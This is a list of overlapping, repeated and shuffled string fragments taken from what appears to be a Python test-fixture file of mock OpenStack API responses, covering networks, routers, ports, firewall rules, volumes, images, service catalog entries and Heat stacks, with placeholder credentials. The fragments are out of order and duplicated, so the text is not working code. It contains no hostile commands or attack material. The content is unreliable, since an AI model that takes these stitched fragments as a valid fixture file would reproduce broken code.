"\"3a44f4e5-1694-493a-a1fb-393881c673a4\", \"subnet_id\": \"a2f1f29d-571b-4533-907f-5803ab96ead1\" } NETWORKS_LIST = { \"networks\": [ { \"status\": \"ACTIVE\", \"subnets\":",
"None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\",",
"'publicURL': 'http://public:8773/services/Cloud', 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'EC2 Service', 'type': 'ec2' }, {",
"'http://heat.usr.lab0.aub.cw-labs.net:8004/v1' AUTH_URL_RESPONSE = { u'version': { u'id': u'v2.0', u'links': [ {u'href': u'%s' %",
"\"health_monitors\": [], \"subnet_id\": \"b892434a-49f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\":",
"\"10.0.0.3\", \"floating_ip_address\": \"172.24.4.228\", \"port_id\": \"ce705c24-c1ef-408a-bda3-7bbd946164ab\", \"id\": FLOATING_IPS_IDS[0] }, { \"router_id\": None, \"tenant_id\": PROJECT_ID,",
"[], 'username': 'exampleuser' } } } ROLE_LIST = {u'roles': [ {u'id': u'201c290919ec4d6bb350401f8b4145a3', u'name':",
"not use this file except in compliance with the License. You may obtain",
"PROJECT_ID, \"id\": ROUTERS_IDS[0] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"router1\", \"admin_state_up\":",
"\"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack1\", \"creation_time\": \"2015-03-03T14:08:54Z\", \"updated_time\": None, \"stack_status\": \"CREATE_SUCCESS\",",
"\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.227\" } ], \"id\": \"664ebd1a-facd-4c20-948c-07a784475ab0\", \"device_id\": ROUTERS_IDS[0] } ] } ROUTER1_PORTS",
"ALARMS_LIST = [ { \"alarm_actions\": [ \"http://site:8000/alarm\" ], \"alarm_id\": ALARMS_IDS[0], \"combination_rule\": None, \"description\":",
"\"content_type\":\"application/octet-stream\" } ] VOLUMES_LIST = { \"volumes\": [ { \"attachments\": [], \"availability_zone\": \"nova\",",
"}, { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"true\", \"created_at\": \"2014-02-03T14:18:34.000000\", \"display_description\": \"\", \"display_name\":",
"\"id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"another_router\", \"admin_state_up\": True,",
"\"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"another_router\", \"admin_state_up\": True, \"tenant_id\": \"6b96ff0cb17a4b859e1e575d221683d3\", \"id\": \"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\"",
"\"user_id\": \"fake\" } ] } IMAGES_LIST = { \"images\": [ { \"checksum\": \"f8a2eeee2dc65b3d9b6e63678955bd83\",",
"} LBAAS_POOL_LIST = { \"pools\": [ { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\",",
"}, { \"hash\": \"ed076287532e86365e841e92bfc50d8c\", \"last_modified\": \"2014-01-15T16:37:43.427570\", \"bytes\": 12, \"name\": STORAGE_OBJECTS[1]['name'], \"content_type\":\"application/octet-stream\" } ]",
"\"max_retries\": 5, \"http_method\": \"GET\", \"timeout\": 2, \"pools\": [], \"url_path\": \"/\", \"type\": \"HTTP\", \"id\":",
"\"status_description\": \"\", \"name\": \"test-http-vip\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\":",
"[ { \"href\": \"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack1\", \"creation_time\":",
"\"f8a2eeee2dc65b3d9b6e63678955bd83\", \"container_format\": \"ami\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ami\", \"id\": \"37717f53-3707-49b9-9dd0-fd063e6b9fc5\",",
"LBAAS_POOL_IDS[0], \"session_persistence\": None }, { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.126\",",
"\"port_filter\": False }, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"\", \"extra_dhcp_opts\": [],",
"PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False } ] } SERVERS_LIST",
"VOLUME_BACKUPS_LIST = { u'backups': [ {u'availability_zone': u'nova', u'container': u'volumebackups', u'created_at': u'2015-09-22T14:59:03.000000', u'description': u'A",
"USER_ID = '<PASSWORD>' PROJECT_ID = '225da22d3ce34b15877ea70b2a575f58' AUTH_URL = \"http://localhost:5000/v2.0\" ROLE_URL = \"http://admin:35357/v2.0/OS-KSADM\" VOLUME_PUBLIC_ENDPOINT",
"'endpoints': [{ 'adminURL': 'http://admin:8773/services/Admin', 'internalURL': 'http://internal:8773/services/Cloud', 'publicURL': 'http://public:8773/services/Cloud', 'region': 'RegionOne'}], 'endpoints_links': [], 'name':",
"FIREWALL_RULE_IDS[0], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False",
"\"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" } ] } SNAPSHOTS_LIST =",
"PROJECT_ID, \"id\": NETWORKS_IDS[1], \"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\": [\"e12f0c45-46e3-446a-b207-9474b27687a6\"], \"name\": \"network_3\",",
"PROJECT_ID, \"id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"another_router\", \"admin_state_up\":",
"\"id\": METERING_LABEL_IDS[0] }, { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test2\", \"name\": \"Meterlabel2\", \"id\":",
"'internalURL': IMAGE_INTERNAL_ENDPOINT, 'publicURL': IMAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Image Service', 'type': 'image'",
"'username': 'exampleuser' } } } ROLE_LIST = {u'roles': [ {u'id': u'201c290919ec4d6bb350401f8b4145a3', u'name': u'heat_stack_owner'},",
"\"source_ip_address\": None, \"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[0], \"name\":",
"\"stack_name\": \"stack1\", \"creation_time\": \"2015-03-03T14:08:54Z\", \"updated_time\": None, \"stack_status\": \"CREATE_SUCCESS\", \"id\": \"5c136348-5550-4ec5-8bd6-b83241844db3\" }, { \"description\":",
"PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[1] }",
"\"afc75773-640e-403c-9fff-62ba98db1f19\", \"shared\": True } ] } SECGROUPS_LIST = { \"security_groups\": [ { \"description\":",
"# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the",
"u'admin'}, {u'id': u'9c3698e2f6a34d59b45d969d78403942', u'name': u'heat_stack_user'}, {u'id': u'9fe2ff9ee4384b1894a90878d3e92bab', u'name': u'_member_'}, {u'id': u'b6673106f5c64c0cbc1970ad706d38c0', u'name': u'anotherrole'}]",
"\"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\":",
"\"description\": \"\", \"health_monitors\": [], \"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"name\": \"Test-Pools\", \"health_monitors_status\":",
"\"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.126\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[1], \"id\":",
"\"creation_time\": \"2015-03-03T14:08:54Z\", \"updated_time\": None, \"stack_status\": \"CREATE_SUCCESS\", \"id\": \"5c136348-5550-4ec5-8bd6-b83241844db3\" }, { \"description\": \"Second test\",",
"\"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None,",
"= {u'roles': [ {u'id': u'201c290919ec4d6bb350401f8b4145a3', u'name': u'heat_stack_owner'}, {u'id': u'edc12489faa74ee0aca0b8a0b4d74a74', u'name': u'Member'}, {u'id': u'6c3ceb6e6112486ba1465a636652b544',",
"\"tenant_id\": \"6b96ff0cb17a4b859e1e575d221683d3\", \"id\": \"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\" }] } ROUTER_CLEAR_GATEWAY = { \"router\": { \"status\": \"ACTIVE\",",
"'image' }, { 'endpoints': [{ 'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58', 'internalURL': COMPUTE_INTERNAL_ENDPOINT, 'publicURL': COMPUTE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}],",
"None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[0], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\",",
"\"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\", \"stack_name\": \"stack2\", \"creation_time\": \"2015-03-03T17:34:21Z\", \"updated_time\": None,",
"True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[1], \"shared\": False }, { \"status\": \"ACTIVE\", \"subnets\": [\"e12f0c45-46e3-446a-b207-9474b27687a6\"],",
"\"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.226\" } ], \"id\": \"c5ca7017-c390-4ccc-8cd7-333747e57fef\", \"device_id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\",",
"STORAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Object Storage Service', 'type': 'object-store' }, {",
"\"kernel_id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"ramdisk_id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\" }, \"protected\": False, \"size\": 25165824, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:54\"",
"ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"another_router\", \"admin_state_up\": True, \"tenant_id\":",
"\"stack_status\": \"CREATE_SUCCESS\", \"id\": \"5c136348-5550-4ec5-8bd6-b83241844db3\" }, { \"description\": \"Second test\", \"links\": [ { \"href\":",
"\"description\": \"Testing firewall policy 1\" }, { \"name\": \"TestFireWallPolicy2\", \"firewall_rules\": [FIREWALL_RULE_IDS[1]], \"tenant_id\": PROJECT_ID,",
"{}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" } ]",
"\"Second test\", \"links\": [ { \"href\": \"http://site/ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\", \"rel\": \"self\" } ], \"stack_status_reason\": \"\",",
"LBAAS_POOL_IDS[1] } ] } LBAAS_MEMBER_LIST = { \"members\": [ { \"id\": LBAAS_MEMBER_IDS[0], \"address\":",
"= 'http://heat.usr.lab0.aub.cw-labs.net:8004/v1' AUTH_URL_RESPONSE = { u'version': { u'id': u'v2.0', u'links': [ {u'href': u'%s'",
"\"61c1b45e-45fe-4e04-8704-bf6f5876607d\", \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ],",
"\"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[0] }, {",
"[ { \"addr\": \"192.168.0.3\", \"version\": 4 } ] }, \"created\": \"2012-09-07T16:56:37Z\", \"flavor\": {",
"\"tenant_id\": PROJECT_ID, \"delay\": 5, \"expected_codes\": \"200\", \"max_retries\": 5, \"http_method\": \"GET\", \"timeout\": 2, \"pools\":",
"80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\":",
"} ], \"stack_status_reason\": \"\", \"stack_name\": \"stack1\", \"creation_time\": \"2015-03-03T14:08:54Z\", \"updated_time\": None, \"stack_status\": \"CREATE_SUCCESS\", \"id\":",
"License. TOKEN_ID = '<KEY>' USER_ID = '<PASSWORD>' PROJECT_ID = '225da22d3ce34b15877ea70b2a575f58' AUTH_URL = \"http://localhost:5000/v2.0\"",
"\"display_name\": \"toto\", \"id\": VOLUMES_IDS[0], \"metadata\": {}, \"size\": 1, \"snapshot_id\": None, \"source_volid\": None, \"status\":",
"{ \"health_monitors\": [ { \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"delay\": 5, \"expected_codes\": \"200\", \"max_retries\":",
"'endpoints': [{ 'adminURL': 'http://admin:35357/v2.0', 'internalURL': 'http://internal:5000/v2.0', 'publicURL': 'http://public:5000/v2.0', 'region': 'RegionOne'}], 'endpoints_links': [], 'name':",
"the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR",
"= { \"firewall_rules\": [ { \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\", \"source_port\": None,",
"\"name\": STORAGE_CONTAINERS[1] } ] STORAGE_OBJECTS_LIST_0 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa79fa1\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\":",
"FIREWALL_RULE_IDS[1], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False",
"\"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True, \"action\": \"allow\", \"ip_version\": 4, \"shared\": False },",
"= { \"firewall_policies\": [ { \"name\": \"TestFireWallPolicy1\", \"firewall_rules\": [FIREWALL_RULE_IDS[0]], \"tenant_id\": PROJECT_ID, \"audited\": False,",
"ROUTERS_IDS[1] } ] } NEUTRON_PORTS = { 'ports': ROUTER0_PORTS['ports'] + ROUTER1_PORTS['ports'] + [",
"\"count\": 1, \"bytes\": 14, \"name\": STORAGE_CONTAINERS[1] } ] STORAGE_OBJECTS_LIST_0 = [ { \"hash\":",
"\"alarm_actions\": [ \"http://site:8000/alarm\" ], \"alarm_id\": ALARMS_IDS[0], \"combination_rule\": None, \"description\": \"An alarm\", \"enabled\": True,",
"\"ingress\", \"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\",",
"] } LBAAS_POOL_LIST = { \"pools\": [ { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\":",
"UNBOUND_PORT_ID, \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound port\", \"network_id\": \"bf8d2e1f-221e-4908-a4ed-b6c0fd06e518\", \"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ],",
"= [\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"61cea855-49cb-4846-997d-801b70c71bdd\"] SERVERS_IDS = [\"616fb98f-46ca-475e-917e-2563e5a8cd19\"] IMAGES_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6b9fc5\", \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"482fbcc3-d831-411d-a073-ddc828a7a9ed\"] ALARMS_IDS =",
"'Identity Service', 'type': 'identity' }, { 'endpoints': [{ 'adminURL': 'http://admin:8080', 'internalURL': STORAGE_INTERNAL_ENDPOINT, 'publicURL':",
"\"http://site:8000/alarm\" ], \"alarm_id\": ALARMS_IDS[0], \"combination_rule\": None, \"description\": \"An alarm\", \"enabled\": True, \"insufficient_data_actions\": [",
"\"stack_name\": \"stack2\", \"creation_time\": \"2015-03-03T17:34:21Z\", \"updated_time\": None, \"stack_status\": \"DELETE_FAILED\", \"id\": \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\" } ] }",
"u'type': u'text/html'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf', u'rel': u'describedby', u'type': u'application/pdf'} ], u'media-types': [ {u'base': u'application/json',",
"= [\"he717f53-3707-49b9-9dd0-fd063e6lbass\"] LBAAS_POOL_IDS = [\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\", \"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"] # Simulating JSON sent from the Server",
"\"ari\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None, \"disk_format\": \"ari\", \"id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\", \"is_public\": True,",
"None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[1], \"name\": \"\", \"tenant_id\": PROJECT_ID, \"enabled\": True,",
"u'name': u'heat_stack_owner'}, {u'id': u'edc12489faa74ee0aca0b8a0b4d74a74', u'name': u'Member'}, {u'id': u'6c3ceb6e6112486ba1465a636652b544', u'name': u'ResellerAdmin'}, {u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name':",
"True, \"tenant_id\": \"ed680f49ff714162ab3612d7876ffce5\", \"id\": \"afc75773-640e-403c-9fff-62ba98db1f19\", \"shared\": True } ] } SECGROUPS_LIST = {",
"'name': 'EC2 Service', 'type': 'ec2' }, { 'endpoints': [{ 'adminURL': 'http://admin:35357/v2.0', 'internalURL': 'http://internal:5000/v2.0',",
"'type': 'compute' }, { 'endpoints': [{ 'adminURL': 'http://admin:8773/services/Admin', 'internalURL': 'http://internal:8773/services/Cloud', 'publicURL': 'http://public:8773/services/Cloud', 'region':",
"[\"mbcdb45e-45fe-4e04-8704-bf6f58760011\", \"meteb45e-45fe-4e04-8704-bf6f58760000\"] LBAAS_MEMBER_IDS = [\"37717f53-3707-49b9-9dd0-fd063e6lbass\", \"la650123-e982-4552-9dec-5dc5d3ea4172\"] LBAAS_VIP_IDS = [\"616fb98f-36ca-475e-917e-1563e5a8cd10\", \"102fbcc3-d831-411d-a333-ddc828a7a9ed\"] LBAAS_HEALTHMONITOR_IDS = [\"he717f53-3707-49b9-9dd0-fd063e6lbass\"]",
"PORTS_IDS[0], \"device_id\": ROUTERS_IDS[1] } ] } NEUTRON_PORTS = { 'ports': ROUTER0_PORTS['ports'] + ROUTER1_PORTS['ports']",
"\"status\": \"ACTIVE\", \"name\": \"fwass-test-2\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[1], \"id\": FIREWALL_IDS[1], \"description\":",
"True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-kernel\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False,",
"{ \"name\": \"TestFireWallPolicy1\", \"firewall_rules\": [FIREWALL_RULE_IDS[0]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[0],",
"\"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"},",
"\"id\": \"93aa42e5-80db-4581-9391-3a608bd0e448\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\":",
"{ \"firewalls\": [ { \"status\": \"ACTIVE\", \"name\": \"fwass-test-1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\":",
"False, \"deleted_at\": None, \"disk_format\": \"ari\", \"id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\", \"is_public\": True, \"min_disk\": 0, \"min_ram\": 0,",
"= { \"volumes\": [ { \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"false\", \"created_at\": \"2014-02-03T14:22:52.000000\",",
"u'self'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/', u'rel': u'describedby', u'type': u'text/html'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf', u'rel': u'describedby', u'type': u'application/pdf'}",
"LBAAS_HEALTHMONITOR_IDS = [\"he717f53-3707-49b9-9dd0-fd063e6lbass\"] LBAAS_POOL_IDS = [\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\", \"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"] # Simulating JSON sent from the",
"[], 'name': 'Identity Service', 'type': 'identity' }, { 'endpoints': [{ 'adminURL': 'http://admin:8080', 'internalURL':",
"0, \"status\": \"ACTIVE\", \"tenant_id\": \"openstack\", \"updated\": \"2012-09-07T16:56:37Z\", \"user_id\": \"fake\" } ] } IMAGES_LIST",
"u'http://docs.openstack.org/api/openstack-identity-service/2.0/identity-dev-guide-2.0.pdf', u'rel': u'describedby', u'type': u'application/pdf'} ], u'media-types': [ {u'base': u'application/json', u'type': u'application/vnd.openstack.identity-v2.0+json'}, {u'base':",
"\"subnet_id\": \"b892434a-59f7-4404-a05d-9562977e1678\", \"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[0], \"session_persistence\": None }, { \"status\": \"ACTIVE\", \"protocol\":",
"[\"d7815f5b-a228-47bb-a5e5-f139c4e476f6\"] NETWORKS_IDS = [\"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\"] SECGROUPS_IDS = [\"85cc3048-abc3-43cc-89b3-377341426ac5\"] FLOATING_IPS_IDS = [\"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"61cea855-49cb-4846-997d-801b70c71bdd\"] SERVERS_IDS",
"\"private\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": NETWORKS_IDS[0], \"shared\": False }, { \"status\": \"ACTIVE\",",
"} ] } FIREWALL_POLICY_LIST = { \"firewall_policies\": [ { \"name\": \"TestFireWallPolicy1\", \"firewall_rules\": [FIREWALL_RULE_IDS[0]],",
"]} REMOVE_ROUTER_INTERFACE = { \"id\": \"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\", \"tenant_id\": \"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"port_id\": \"3a44f4e5-1694-493a-a1fb-393881c673a4\", \"subnet_id\": \"a2f1f29d-571b-4533-907f-5803ab96ead1\" }",
"'RegionOne'}], 'endpoints_links': [], 'name': 'EC2 Service', 'type': 'ec2' }, { 'endpoints': [{ 'adminURL':",
"\"firewall_rules\": [FIREWALL_RULE_IDS[0]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[0], \"description\": \"Testing firewall",
"\"hash\": \"451e372e48e0f6b1114fa0724aa7AAAA\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[2]['name'], \"content_type\":\"application/octet-stream\" } ] VOLUMES_LIST =",
"\"connection_limit\": -1, \"pool_id\": LBAAS_POOL_IDS[1], \"session_persistence\": None } ] } LBAAS_POOL_LIST = { \"pools\":",
"{ \"accessIPv4\": \"\", \"accessIPv6\": \"\", \"addresses\": { \"private\": [ { \"addr\": \"192.168.0.3\", \"version\":",
"\"cirros-0.3.1-x86_64-uec-kernel\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\": False, \"size\": 4955792, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:52\"",
"\"href\": \"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"bookmark\" } ], \"metadata\": { \"My Server Name\": \"Apache1\" },",
"'janeausten', 'name': 'bar'}, {'container': 'marktwain', 'name': 'hello world'}] VOLUMES_IDS = [\"45baf976-c20a-4894-a7c3-c94b7376bf55\", \"5aa119a8-d25b-45a7-8d1b-88e127885635\"] SNAPSHOTS_IDS",
"\"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[0], \"id\": FIREWALL_IDS[0], \"description\": \"\" }, { \"status\": \"ACTIVE\", \"name\":",
"] }, \"links\": [ { \"href\": \"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"self\" }, { \"href\": \"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\",",
"] STORAGE_OBJECTS_LIST_0 = [ { \"hash\": \"451e372e48e0f6b1114fa0724aa79fa1\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[0]['name'],",
"'expires': '2012-10-03T16:53:36Z', 'id': TOKEN_ID, 'tenant': { 'description': '', 'enabled': True, 'id': PROJECT_ID, 'name':",
"None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID } ],",
"\"status\": \"ACTIVE\", \"tenant_id\": \"openstack\", \"updated\": \"2012-09-07T16:56:37Z\", \"user_id\": \"fake\" } ] } IMAGES_LIST =",
"\"mac_address\": \"fa:16:3e:2d:dc:7e\", \"fixed_ips\": [ { \"subnet_id\": \"a318fcb4-9ff0-4485-b78c-9e6738c21b26\", \"ip_address\": \"10.0.0.1\" } ], \"id\": PORTS_IDS[0],",
"}, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"\", \"extra_dhcp_opts\": [], \"fixed_ips\": [",
"None, \"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[0], \"name\": \"\",",
"\"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.125\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[0], \"id\":",
"\"description\": \"First test\", \"links\": [ { \"href\": \"http://site/5c136348-5550-4ec5-8bd6-b83241844db3\", \"rel\": \"self\" } ], \"stack_status_reason\":",
"\"fixed_ip_address\": \"10.0.0.3\", \"floating_ip_address\": \"172.24.4.228\", \"port_id\": \"ce705c24-c1ef-408a-bda3-7bbd946164ab\", \"id\": FLOATING_IPS_IDS[0] }, { \"router_id\": None, \"tenant_id\":",
"'publicURL': METERING_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Metering service', 'type': 'metering' }, {",
"\"firewall_rules\": [FIREWALL_RULE_IDS[1]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False, \"id\": FIREWALL_POLICY_IDS[1], \"description\": \"Testing firewall",
"express or implied. See the # License for the specific language governing permissions",
"ROUTER_CLEAR_GATEWAY = { \"router\": { \"status\": \"ACTIVE\", \"external_gateway_info\": None, \"name\": \"second_routers\", \"admin_state_up\": True,",
"\"is_public\": True, \"min_disk\": 0, \"min_ram\": 0, \"name\": \"cirros-0.3.1-x86_64-uec-ramdisk\", \"owner\": PROJECT_ID, \"properties\": {}, \"protected\":",
"u'name': u'_member_'}, {u'id': u'b6673106f5c64c0cbc1970ad706d38c0', u'name': u'anotherrole'}] } STORAGE_CONTAINERS_LIST = [ { \"count\": 0,",
"\"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\" } ], \"id\": \"61c1b45e-45fe-4e04-8704-bf6f5876607d\", \"mac_address\": \"fa:16:3e:f5:62:22\", \"name\": \"custom unbound",
"\"firewall_policies\": [ { \"name\": \"TestFireWallPolicy1\", \"firewall_rules\": [FIREWALL_RULE_IDS[0]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\": False,",
"False, \"state\": \"ok\", \"state_timestamp\": \"2013-11-21T12:33:08.486228\", \"threshold_rule\": None, \"timestamp\": \"2013-11-21T12:33:08.486221\", \"type\": \"threshold\", \"user_id\": \"c96c887c216949acbdfbd8b494863567\"",
"\"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"router1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[1] },",
